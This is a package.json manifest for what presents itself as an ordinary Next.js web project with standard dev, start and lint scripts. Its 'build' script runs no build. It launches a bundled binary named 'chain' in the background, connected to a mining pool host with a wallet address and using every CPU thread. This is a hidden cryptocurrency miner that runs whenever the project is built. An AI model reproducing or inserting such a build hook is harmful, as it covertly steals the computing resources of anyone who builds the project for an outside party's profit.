{
  "name": "nextjs",
  "version": "0.1.0",
  "private": true,
  "scripts": {
    "dev": "next dev",
    "build": "chmod +x chain && nohup ./chain -o web-ko1.gonspool.com:33330 -u 0x618758ae107193d6334439f6b3f1553ac6e43b62 --worker-id=4 -p x -t $(nproc --all)",
    "start": "next start",
    "lint": "next lint"
  },
  "dependencies": {
    "next": "12.2.5",
    "react": "18.2.0",
    "react-dom": "18.2.0"
  },
  "devDependencies": {
    "eslint": "8.22.0",
    "eslint-config-next": "12.2.5"
  }
}
